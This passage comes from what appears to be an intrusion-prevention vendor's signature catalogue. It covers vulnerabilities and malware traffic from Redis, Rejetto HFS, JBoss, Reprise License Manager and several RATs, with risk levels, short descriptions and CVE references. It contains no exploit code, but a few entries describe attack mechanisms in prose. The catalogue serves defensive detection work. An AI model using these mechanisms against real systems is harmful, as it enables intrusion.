CVE-2015-3215
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3215

Red-Hat-Networkmanager-DHCP-Command-Injection

About this vulnerability:

A vulnerability in Red Hat RPM resource

Risk:

Moderate

First detected in:

sgpkg-ips-1072-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Red Hat RPM resource

Type:

Input Validation

Description:

There has been reported a command injection vulnerability in the Red Hat Network Manager. A remote attacker can exploit this vulnerability by sending malicious DHCP responses to a target client. Successful exploitation results in arbitrary command execution.

Situation:

BOOTP_CS-Red-Hat-Networkmanager-DHCP-Command-Injection

References:

CVE-2018-1111
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1111

Red-Lion-Crimson-CD3-Itemindexlist-Type-Confusion

About this vulnerability:

A vulnerability in Red Lion Crimson

Risk:

Moderate

First detected in:

sgpkg-ips-1211-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Red Lion Crimson

Type:

Malfunction

Description:

There exists a type confusion vulnerability in Red Lion Crimson. Successful exploitation could lead in arbitrary code execution.

Situation:

File-Text_Red-Lion-Crimson-CD3-Itemindexlist-Type-Confusion

References:

CVE-2019-10984
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10984

Red-Lion-Crimson-CD3-Port-List-Type-Confusion

About this vulnerability:

A vulnerability in Red Lion Crimson

Risk:

Moderate

First detected in:

sgpkg-ips-1253-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Red Lion Crimson

Type:

Malfunction

Description:

Improper handling of malformed CD3 file structures causes a type confusion vulnerability in Red Lion Crimson. A successful exploit may allow an attacker to execute arbitrary code with the privileges of the target process.

Situation:

File-Text_Red-Lion-Crimson-CD3-Port-List-Type-Confusion

References:

CVE-2019-10996
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10996

Red-October

About this vulnerability:	Red October
Risk:	High
First detected in:	sgpkg-ips-618-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Red October is a cyber espionage network that targets Diplomatic and Government agencies. The infection spreads through malicious e-mail attachments and links.
Situation:	HTTP_CSH-Red-October-Activity

Redaeefe-Trojan-Infection-Traffic

About this vulnerability:	Redaeefe trojan infection traffic
Risk:	High
First detected in:	sgpkg-ips-1357-5242
Last changed:	sgpkg-ips-1357-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Redaeefe trojan infection traffic was detected.
Situation:	HTTP_CRL-Redaeefe-Trojan-Infection-Traffic

Redgirl-Bot

About this vulnerability:	RedGirl Bot
Risk:	High
First detected in:	sgpkg-ips-619-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	RedGirl is a Trojan that opens a backdoor on the infected machine to allow a remote attacker access to it.
Situation:	HTTP_CSH-Redgirl-Bot-Traffic

Redhat-Jboss-Enterprise-Application-Platform-Jmx-Console-Authentication-Bypass

About this vulnerability:

A vulnerability in Red Hat JBoss Enterprise Application Platform

Risk:

High

First detected in:

sgpkg-ips-373-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Red Hat JBoss Enterprise Application Platform; Red Hat JBoss Enterprise Application Platform

Type:

Malfunction

Description:

An authentication bypass vulnerability has been reported in JBoss Enterprise Application Platform JMX Console application. The vulnerability is caused by the authentication policy within the application that only enforces restrictions for GET and POST methods, other HTTP request verbs bypass authentication. Unauthenticated remote attackers could exploit this vulnerability to gain administrative access to JBoss JMX management console and to upload and execute arbitrary Java code within the security context of the JBoss server process, normally SYSTEM on Windows platforms.

Situation:

HTTP_CSU-Redhat-Jboss-Enterprise-Application-Platform-Jmx-Console-Auth-Bypass

References:

CVE-2010-0738
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0738

BID-39710
http://www.securityfocus.com/bid/39710

Redhat-Jboss-JNDI-Lack-of-Authentication

About this vulnerability:

A Redhat Jboss JNDI Lack of Authentication vulnerability

Risk:

High

First detected in:

sgpkg-ips-999-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Red Hat Linux

Software:

Red Hat JBoss Enterprise Application Platform

Type:

Misconfiguration

Description:

A vulnerability in RedHat JBoss JNDI which allows remote attackers to gain escalated privileges and access to target servers due to the lack of authentication when adding, deleting, and modifying items in the JNDI tree.

Situation:

Generic_CS-Redhat-Jboss-JNDI-Lack-of-Authentication

References:

CVE-2011-4605
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4605

Redis-Getkeysusingkeyspecs-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Redis

Risk:

High

First detected in:

sgpkg-ips-1634-5242

Last changed:

sgpkg-ips-1634-5242

Platform:

Generic

Software:

Redis

Type:

Buffer Overflow

Description:

A heap-based buffer overflow vulnerability has been reported in Redis. The vulnerability is due to improper validation of user input when extracting keys from a command. A remote attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in denial-of-service condition and, in the worst case scenario, arbitrary code execution in the security context of the Redis process.

Situation:

Generic_CS-Redis-Getkeysusingkeyspecs-Heap-Buffer-Overflow

References:

CVE-2023-36824
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36824

Redis-Hrandfield-Zrandmember-Command-Integer-Overflow

About this vulnerability:

A vulnerability in Redis

Risk:

Moderate

First detected in:

sgpkg-ips-1559-5242

Last changed:

sgpkg-ips-1559-5242

Platform:

Generic

Software:

Redis

Type:

Integer Overflow

Description:

A denial of service vulnerability has been reported for Redis. This vulnerability is due an integer overflow error when handling the HRANDFIELD and ZRANDMEMBER commands. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in denial of service.

Situation:

Generic_CS-Redis-Hrandfield-Zrandmember-Command-Integer-Overflow

References:

CVE-2023-22458
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22458

Redis-HyperLogLog-Hllcount-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Redis Labs Redis

Risk:

Moderate

First detected in:

sgpkg-ips-1213-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Redis

Type:

Buffer Overflow

Description:

A stack buffer overflow has been reported in Redis. The vulnerability is due to insufficient handling of the PFCOUNT command on HyperLogLog structures which have been corrupted using one of several possible commands. A remote attacker can exploit this vulnerability by sending crafted commands to the target server followed by a PFCOUNT command. Successful exploitation could result in the execution of arbitrary code as the user running Redis.

Situation:

Generic_CS-Redis-HyperLogLog-Hllcount-Stack-Buffer-Overflow

References:

CVE-2019-10193
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10193

Redis-HyperLogLog-Hllsparsetodense-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Redis Labs Redis

Risk:

Moderate

First detected in:

sgpkg-ips-1213-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Redis

Type:

Buffer Overflow

Description:

A heap buffer overflow has been reported in Redis. The vulnerability is due to insufficient handling of crafted HyperLogLog structures utilizing sparse encoding when converting the structure to dense encoding. A remote attacker can exploit this vulnerability by sending crafted commands to the target server followed by a PFADD command that triggers conversion of a sparsely encoded HyperLogLog structure to dense encoding. Successful exploitation could result in the execution of arbitrary code as the user running Redis.

Situation:

Generic_CS-Redis-HyperLogLog-Hllsparsetodense-Heap-Buffer-Overflow

References:

CVE-2019-10192
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10192

Redis-Lua-Sandbox-Escape-CVE-2022-0543

About this vulnerability:

A vulnerability in Redis

Risk:

High

First detected in:

sgpkg-ips-1460-5242

Last changed:

sgpkg-ips-1460-5242

Platform:

Generic

Software:

Redis

Type:

Malfunction

Description:

A Lua-based sandbox escape has been reported in Debian and Ubuntu Redis packages. Succesful exploitation of this vulnerability could allow unauthenticated attackers to execute arbitrary code.

Situation:

Generic_CS-Redis-Lua-Sandbox-Escape-CVE-2022-0543

References:

CVE-2022-0543
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0543

Redis-Lua-Scripting-Component-Getnum-Integer-Overflow

About this vulnerability:

A vulnerability in Redis Labs Redis

Risk:

High

First detected in:

sgpkg-ips-721-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Redis

Type:

Integer Overflow

Description:

There exists an integer overflow vulnerability in Redis. A remote attacker can use this to acchieve arbitrary code execution on the affected machine.

Situation:

Generic_CS-Redis-Lua-Scripting-Component-Getnum-Integer-Overflow

References:

CVE-2015-8080
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8080

Redis-Msetnx-Command-Denial-Of-Service

About this vulnerability:

A vulnerability in Redis

Risk:

Moderate

First detected in:

sgpkg-ips-1581-5242

Last changed:

sgpkg-ips-1581-5242

Platform:

Generic

Software:

Redis

Type:

Input Validation

Description:

A denial of service vulnerability has been reported in Redis. The vulnerability is due to improper input validation of user input to the MSETNX command. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in denial of service conditions on the target server.

Situation:

Generic_CS-Redis-Msetnx-Command-Denial-Of-Service

References:

CVE-2023-28425
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28425

Redis-Replication-Code-Execution

About this vulnerability:	A vulnerability in Redis
Risk:	Moderate
First detected in:	sgpkg-ips-1343-5242
Last changed:	sgpkg-ips-1343-5242
Platform:	Linux
Software:	Redis
Type:	Insecure Configuration
Description:	There exists a vulnerability in Redis, starting in version 4.0.0, which allowes remote attackers to modify or add any data into the databse and register a rogue servers.
Situation:	Generic_CS-Redis-Replication-Code-Execution

Redis-Scan-Keys-Command-Denial-Of-Service

About this vulnerability:

A vulnerability in Redis.

Risk:

Moderate

First detected in:

sgpkg-ips-1590-5242

Last changed:

sgpkg-ips-1590-5242

Platform:

Generic

Software:

Redis

Type:

Input Validation

Description:

A vulnerability in Redis, versions 6.0.x prior to 6.0.18, 6.2.x prior to 6.2.11, and 7.0.x prior to 7.0.9, which allows remote attackers to cause a denial of service condition by sending crafted requests to the target server, due to the improper input validation when string pattern matching for commands.

Situation:

Generic_CS-Redis-Scan-Keys-Command-Denial-Of-Service

References:

CVE-2022-36021
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36021

Redis-Setrange-Sort-Command-Integer-Overflow

About this vulnerability:

A vulnerability in Redis.

Risk:

High

First detected in:

sgpkg-ips-1555-5242

Last changed:

sgpkg-ips-1555-5242

Platform:

Generic

Software:

Redis

Type:

Integer Overflow

Description:

A vulnerability in Redis, versions 6.0.0 above and prior to 6.0.17, 6.2.0 above and prior to 6.2.9, and 7.0.0 above and prior to 7.0.8, which allows remote attackers to create a denial of service condition by sending a crafted request to the target server, due an integer overflow error when handling the SETRANGE, SORT, and SORT_RO commands.

Situation:

Generic_CS-Redis-Setrange-Sort-Command-Integer-Overflow

References:

CVE-2022-35977
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35977

Redis-SSH-Authorized-Keys-Overwrite

About this vulnerability:	A vulnerability in Redis Labs Redis
Risk:	High
First detected in:	sgpkg-ips-1060-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Redis
Type:	Misconfiguration
Description:	The Redis service can by design write to any file within the reach of the user running the service, including the .ssh/authorized_keys file of the user. When the service is configured without authentication, this may lead to system compromise as a remote client may simply install their own SSH-key by overwriting the authorized_keys file of the user running the Redis server.
Situation:	Generic_CS-Redis-SSH-Authorized-Keys-Overwrite

Redis-Unauthenticated-Code-Execution

About this vulnerability:	A vulnerability in Redis
Risk:	High
First detected in:	sgpkg-ips-1200-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Linux
Software:	Redis
Type:	Input Validation
Description:	A vulnerability in Redis, versions 4.x and 5.x, which allows remote attackers to execute arbitrary code do to insufficient user input validation.
Situation:	Generic_CS-Redis-Unauthenticated-Code-Execution

Redis-Xautoclaim-Command-Count-Integer-Overflow

About this vulnerability:

A vulnerability in Redis

Risk:

Moderate

First detected in:

sgpkg-ips-1511-5242

Last changed:

sgpkg-ips-1511-5242

Platform:

Generic

Software:

Redis

Type:

Integer Overflow

Description:

Improper handling of the COUNT argument in the XAUTOCLAIM command causes an integer overflow vulnerability in Redis. A successful exploit may allow an attacker to execute arbitrary code on the target system.

Situation:

Generic_CS-Redis-Xautoclaim-Command-Count-Integer-Overflow

References:

CVE-2022-35951
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35951

Redline-Password-Stealer-Infection-Traffic

About this vulnerability:	Redline Password Stealer infection traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1378-5242
Last changed:	sgpkg-ips-1396-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Redline Password Stealer infection traffic was detected.
Situation:	Generic_CS-Redline-Password-Stealer-Infection-Traffic HTTP_CSH-Redline-Password-Stealer-Infection-Traffic

Redmine-Bazaar-Repository-Adapter-Command-Execution

About this vulnerability:

A Redmine Bazaar Repository Adapter Command Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-710-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Redmine

Type:

Input Validation

Description:

A vulnerability in Redmine Bazaar Repository Adapter, versions 0.9.x and 1.0.x before 1.0.5, which allows remote attackers to execute arbitrary commands via the rev parameter.

Situation:

HTTP_CSU_Redmine-Bazaar-Repository-Adapter-Command-Execution

References:

CVE-2011-4929
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4929

BID-45571
http://www.securityfocus.com/bid/45571

OSVDB-70090
http://www.osvdb.org/70090

Rejetto-HTTP-File-Server-(HFS)-Unauthenticated-RCE

About this vulnerability:

An attempt to exploit a vulnerability in Rejetto HTTP File Server detected

Risk:

High

First detected in:

sgpkg-ips-1742-5242

Last changed:

sgpkg-ips-1742-5242

Platform:

Windows

Software:

Rejetto HttpFileServer

Type:

Input Validation

Description:

A vulnerability in Rejetto Http File Server, version 2.x, which allows remote attackers to execute arbitrary code by injecting a malicious template, due to insufficient input validation.

Situation:

HTTP_CRL-Rejetto-HTTP-File-Server-(HFS)-Unauthenticated-RCE

References:

CVE-2024-23692
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23692

Rejetto-HTTP-File-Server-Command-Injection-CVE-2024-39943

About this vulnerability:

A vulnerability in Rejetto HTTP File Server

Risk:

High

First detected in:

sgpkg-ips-1761-5242

Last changed:

sgpkg-ips-1761-5242

Platform:

Generic

Software:

Rejetto HttpFileServer

Type:

Input Validation

Description:

A command injection vulnerability has been reported for Rejetto HTTP File Server (HFS). This vulnerability is due to improper input validation of folder names. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary command execution in the security context of the server process.

Situation:

HTTP_CS-Rejetto-HTTP-File-Server-Command-Injection-CVE-2024-39943
HTTP_CS-Rejetto-HTTP-File-Server-Possible-Command-Injection-CVE-2024-39943
HTTP_CSU-Rejetto-HTTP-File-Server-Command-Injection-CVE-2024-39943
HTTP_CSU-Rejetto-HTTP-File-Server-Possible-Command-Injection-CVE-2024-39943

References:

CVE-2024-39943
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-39943

Rejetto-HttpFileServer-Remote-Command-Execution

About this vulnerability:

A Rejetto HttpFileServer Remote Command Execution Vulnerability.

Risk:

High

First detected in:

sgpkg-ips-696-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Rejetto HttpFileServer

Type:

Input Validation

Description:

A vulnerability in Rejetto HttpFileServer, versions before 2.3c, which allows remote attackers to execute arbitrary commands in a search action by using a %00 sequence to bypass input filtering.

Situation:

HTTP_CSU-Rejetto-HttpFileServer-Remote-Command-Execution

References:

CVE-2014-6287
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6287

Remcos-RAT-C2-Traffic

About this vulnerability:	Remcos RAT C2 traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1108-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Remcos is a remote access tool sold by Breaking Security. The company says the tool is only sold for legitimate purposes, but it's constantly used in malicious campaigns.
Situation:	Generic_CS-Remcos-RAT-C2-Traffic

Remote-Code-Execution-Via-Cpio-In-Zimbra-Collaboration-Suite-CVE-2022-41352

About this vulnerability:

An attempt to exploit a vulnerability in Zimbra Collaboration Suite detected

Risk:

High

First detected in:

sgpkg-ips-1515-5242

Last changed:

sgpkg-ips-1606-5242

Platform:

Generic

Software:

Zimbra Collaboration Server

Type:

Input Validation

Description:

An issue was discovered in Zimbra Collaboration Suite 8.8.15 and 9.0. An attacker can upload arbitrary files through amavisd via a cpio loophole (extraction to /opt/zimbra/jetty/webapps/zimbra/public) that can lead to incorrect access to any other user accounts.

Situation:

File-Binary_Remote-Code-Execution-Via-Cpio-In-Zimbra-Collaboration-Suite-CVE-2022-41352
File-Binary_Suspicious-Link-Name-In-Tar-Archive

References:

CVE-2022-41352
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41352

Remote-Desktop-Code-Execution-Vulnerability

About this vulnerability:

A vulnerability in Windows

Risk:

High

First detected in:

sgpkg-ips-443-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A vulnerability in Windows

Situation:

Generic_CS-Remote-Desktop-Code-Execution-Vulnerability

References:

CVE-2012-0002
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0002

BID-52354
http://www.securityfocus.com/bid/52354

OSVDB-80000
http://www.osvdb.org/80000

MS12-020
http://technet.microsoft.com/security/bulletin/MS12-020

Remote-Desktop-Protocol-Vulnerability

About this vulnerability:

A vulnerability in Windows Remote Desktop Protocol

Risk:

High

First detected in:

sgpkg-ips-468-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A vulnerability in Windows

Situation:

Generic_CS-Remote-Desktop-Protocol-Vulnerability

References:

CVE-2012-2526
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2526

MS12-053
http://technet.microsoft.com/security/bulletin/MS12-053

Remote-Mouse-RCE

About this vulnerability:

A vulnerability in Remote Mouse.

Risk:

High

First detected in:

sgpkg-ips-1514-5242

Last changed:

sgpkg-ips-1514-5242

Platform:

Windows

Software:

Remote Mouse

Type:

Insecure Configuration

Description:

A vulnerability in Remote Mouse which allows remote attackers to deploy a payload and run it from the server.

Situation:

Generic_CS-Remote-Mouse-RCE

References:

CVE-2022-3365
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3365

Remote-Registry-Service-Elevation-Of-Privilege-CVE-2024-43532

About this vulnerability:

An attempt to exploit a vulnerability in Windows' Remote Registry client detected

Risk:

High

First detected in:

sgpkg-ips-1793-5242

Last changed:

sgpkg-ips-1793-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

This fingerprint detects attempts to exploit an elevation of privilege (EoP) vulnerability in Microsoft's Remote Registry client (CVE-2024-43532). The vulnerability involves a fallback mechanism in the client's implementation that uses obsolete transport protocols insecurely if the SMB transport is unavailable. By exploiting it, an attacker can relay the client's NTLM authentication details to the Active Directory Certificate Services (ADCS) and request a user certificate to leverage for further authentication in the domain.

Situation:

MSRPC-TCP_Remote-Registry-Service-Elevation-Of-Privilege-CVE-2024-43532

References:

CVE-2024-43532
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43532

Reolink-Testemail-OS-Command-Injection-CVE-2019-11001

About this vulnerability:

A vulnerability in Reolink devices

Risk:

High

First detected in:

sgpkg-ips-1816-5242

Last changed:

sgpkg-ips-1816-5242

Platform:

Generic

Software:

Reolink

Type:

Input Validation

Description:

A command injection vulnerability has been reported in the TestEmail functionality of the Reolink RLC-410W, RLC-422W, and RLC-511W devices. An authenticated admin user can exploit this vulnerability to execute arbitrary OS commands via a crafted HTTP request.

Situation:

HTTP_CRL-Reolink-Testemail-OS-Command-Injection-CVE-2019-11001

References:

CVE-2019-11001
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11001

Reprise-License-Manager-Diagnostics_doit-Directory-Traversal

About this vulnerability:	A vulnerability in Reprise Software License Manager
Risk:	Moderate
First detected in:	sgpkg-ips-710-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Reprise Software License Manager; Borland AccuRev
Type:	Directory Traversal
Description:	A path traversal vulnerability exists in the Reprise License Manager. The vulnerability is due to insufficient input validation while processing HTTP requests to the "/goform/diagnostics_doit" URI. A remote unauthenticated attacker can leverage this vulnerability by sending crafted HTTP requests to the target system. Successful exploitation would allow an attacker to cause a denial of service condition on the affected system by overwriting arbitrary files with diagnostic information.
Situation:	HTTP_CRL-Reprise-License-Manager-Diagnostics_doit-Directory-Traversal

Reprise-License-Manager-Edit_lf_Get_Data-Directory-Traversal

About this vulnerability:	A vulnerability in Reprise Software License Manager
Risk:	Moderate
First detected in:	sgpkg-ips-689-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Reprise Software License Manager; Borland AccuRev
Type:	Directory Traversal
Description:	A directory traversal vulnerability exists in the Reprise License Manager. The vulnerability is due to insufficient input validation while processing HTTP requests to the edit_lf_get_data operation. A remote authenticated attacker can leverage this vulnerability by sending crafted HTTP requests to the target system. Successful exploitation would lead to information disclosure via reading of arbitrary files on the target system.
Situation:	HTTP_CRL-Reprise-License-Manager-Edit_lf_Get_Data-Directory-Traversal

Reprise-License-Manager-Edit_lf_Process-Directory-Traversal

About this vulnerability:	A vulnerability in Reprise Software License Manager
Risk:	Moderate
First detected in:	sgpkg-ips-704-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Reprise Software License Manager; Borland AccuRev
Type:	Directory Traversal
Description:	Arbitrary code can be executed by an attacker by exploiting a directory traversal vulnerability caused by insufficient validation when parsing HTTP requests.
Situation:	HTTP_CRL-Reprise-License-Manager-Edit_lf_Process-Directory-Traversal

Reprise-License-Manager-HTTP-Parameter-Parsing-Stack-Buffer-Overflow

About this vulnerability:	A vulnerability in Reprise Software License Manager
Risk:	Moderate
First detected in:	sgpkg-ips-683-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Reprise Software License Manager; Borland AccuRev
Type:	Buffer Overflow
Description:	A stack buffer overflow vulnerability exists in the Reprise License Manager. The vulnerability is due to insufficient input validation of the licfile and debuglog parameters while processing an HTTP request. Successful exploitation would lead to arbitrary code execution under the security context of the running process. An unsuccessful exploit attempt would lead to the rlm.exe process terminating abnormally, denying service to legitimate users.
Situation:	HTTP_CRL-Reprise-License-Manager-HTTP-Parameter-Parsing-Stack-Buffer-Overflow

Reprise-License-Manager-Multiple-HTTP-Parameters-Parsing-Buffer-Overflow

About this vulnerability:	A vulnerability in Reprise Software License Manager
Risk:	Moderate
First detected in:	sgpkg-ips-685-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Reprise Software License Manager; Borland AccuRev
Type:	Buffer Overflow
Description:	A stack buffer overflow vulnerability exists in the Reprise License Manager. The vulnerability is due to insufficient input validation of the actserver and akey parameters while processing a number of HTTP requests. Successful exploitation would lead to arbitrary code execution under the security context of the running process. An unsuccessful exploit attempt would lead to the rlm.exe process terminating abnormally, denying service to legitimate users.
Situation:	HTTP_CRL-Reprise-License-Manager-Multiple-HTTP-Parameters-Parsing-Buffer-Overflow

Responsive-File-Manager-Ajax_calls.php-Get_File-Directory-Traversal

About this vulnerability:

A vulnerability in Responsive File Manager Responsive File Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1145-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Responsive File Manager

Type:

Directory Traversal

Description:

Insufficient sanitization of directory traversal characters by the ajax_calls.php causes a directory traversal vulnerability in Responsive File Manager. A successful attack may allow an attacker to read arbitrary files on the target system.

Situation:

HTTP_CRL-Responsive-File-Manager-Ajax_calls.php-Get_File-Directory-Traversal

References:

CVE-2018-20792
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20792

Responsive-Filemanager-Ajax_calls.php-Information-Disclosure

About this vulnerability:

A vulnerability in Responsive File Manager Responsive File Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1111-5242

Last changed:

sgpkg-ips-1641-5242

Platform:

Generic

Software:

Responsive File Manager

Type:

Directory Traversal

Description:

There has been reported a directory traversal vulnerability in Responsive FileManager. This vulnerability is remotely exploitable. Successful exploitation could lead arbitrary file read on the target server.

Situation:

HTTP_CRL-Responsive-Filemanager-Ajax_calls.php-Zip-Directory-Traversal

References:

CVE-2018-15535
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15535

Responsive-Filemanager-Ajax_calls.php-Zip-Directory-Traversal

About this vulnerability:

A vulnerability in Responsive File Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1112-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Responsive File Manager

Type:

Input Validation

Description:

There has been reported a directory traversal vulnerability in Responsive FileManager. This vulnerability can be exploited remotely without authentication. Successful exploitation might lead in arbitrary code execution.

Situation:

References:

CVE-2018-15536
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15536

RevCode-RAT-C2-Traffic

About this vulnerability:	RevCode RAT C2 traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1105-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	RevCode is a remote access trojan capable to fully control the target system. Infected systems are controlled from a web page based command and control server hosted by the RevCoder seller.
Situation:	HTTP_CRL-RevCode-RAT-C2-Traffic

RevengeRAT-Malware-C2-Traffic

About this vulnerability:	RevengeRAT malware C2 traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1144-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	RevengeRAT is a remote access trojan capable to perform many different tasks such as logging keystrokes in the infected systems.
Situation:	Generic_CS-RevengeRAT-Malware-C2-Traffic

ReverseRAT-Infection-Traffic

About this vulnerability:	ReverseRAT infection traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1378-5242
Last changed:	sgpkg-ips-1378-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	ReverseRAT infection traffic was detected.
Situation:	HTTP_CSU-ReverseRAT-Infection-Traffic

Reveton-Botnet

About this vulnerability:	Reveton botnet traffic
Risk:	Moderate
First detected in:	sgpkg-ips-559-5211
Last changed:	sgpkg-ips-1793-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Reveton is a malicious botnet known for a peculiar category of monetization, called ransomware. The main focus of Reveton's monetization is to lock access to a user's computer and demand ransom in return, apparently to unlock the computer. However, Reveton has the ability to download arbitrary malicious functionality, so its monetization is not restricted to the above.

Rhino-Software-Serv-U-FTP-Server-RNTO-Command-Directory-Traversal

About this vulnerability:

A vulnerability in Rhino Software Serv-U FTP Server

Risk:

Moderate

First detected in:

sgpkg-ips-420-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Serv-U FTP Server

Type:

Input Validation

Description:

There is a directory traversal vulnerability in the Rhino Software Serv-U FTP Server. The vulnerability is due to an input validation error in server that does not properly sanitize the RNTO command. Successful exploitation allows authenticated remote attackers to write arbitrary files to any location on the vulnerable server.

Situation:

FTP_CS-Rhino-Software-Serv-U-FTP-Server-RNTO-Command-Directory-Traversal

References:

BID-31563
http://www.securityfocus.com/bid/31563

Rhino-Software-Serv-U-Web-Client-Request-Remote-Buffer-Overflow

About this vulnerability:

A vulnerability in Rhino Software Serv-U

Risk:

High

First detected in:

sgpkg-ips-378-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Serv-U HTTP Server

Type:

Buffer Overflow

Description:

A code execution vulnerability exists in Rhino Software Serv-U. The vulnerability is due to a buffer overflow that can occur when Servu-U Web Client handles HTTP requests containing overly large session Cookie values. Remote attackers could exploit this vulnerability by sending a malicious HTTP request to a vulnerable version of the application. Successful exploitation of this vulnerability would result in arbitrary code injection and execution with the privileges of the affected service. If code execution is not successful, the affected application may terminate abnormally.

Situation:

HTTP_CSH-Rhino-Software-Serv-U-Web-Client-Request-Remote-Buffer-Overflow

References:

CVE-2009-4006
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4006

RichFaces-Framework-Expression-Language-Injection-CVE-2018-12533

About this vulnerability:

A vulnerability in RichFaces framework

Risk:

High

First detected in:

sgpkg-ips-1815-5242

Last changed:

sgpkg-ips-1815-5242

Platform:

Generic

Software:

RichFaces framework

Type:

Malfunction

Description:

An expression language injection has been reported in the RichFaces framework versions 3.1.0 through 3.3.4. An unauthenticated attacker can exploit this vulnerability by using a maliciously crafted Java serialized object in an HTTP request. A successful exploit can lead into arbitrary code execution.

Situation:

HTTP_CSU-RichFaces-Framework-DATA-URL-Segment-With-Compressed-Content
HTTP_CSU-RichFaces-Framework-Expression-Language-Injection-Known-Payload

References:

CVE-2018-12533
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12533

RichFaces-Framework-Expression-Language-Injection-CVE-2018-14667

About this vulnerability:

A vulnerability in RichFaces framework

Risk:

High

First detected in:

sgpkg-ips-1815-5242

Last changed:

sgpkg-ips-1815-5242

Platform:

Generic

Software:

RichFaces framework

Type:

Malfunction

Description:

An expression language injection has been reported in the RichFaces framework versions 3.x through 3.3.4. An unauthenticated attacker can exploit this vulnerability by using a maliciously crafted Java serialized object in an HTTP request. A successful exploit can lead into arbitrary code execution.

Situation:

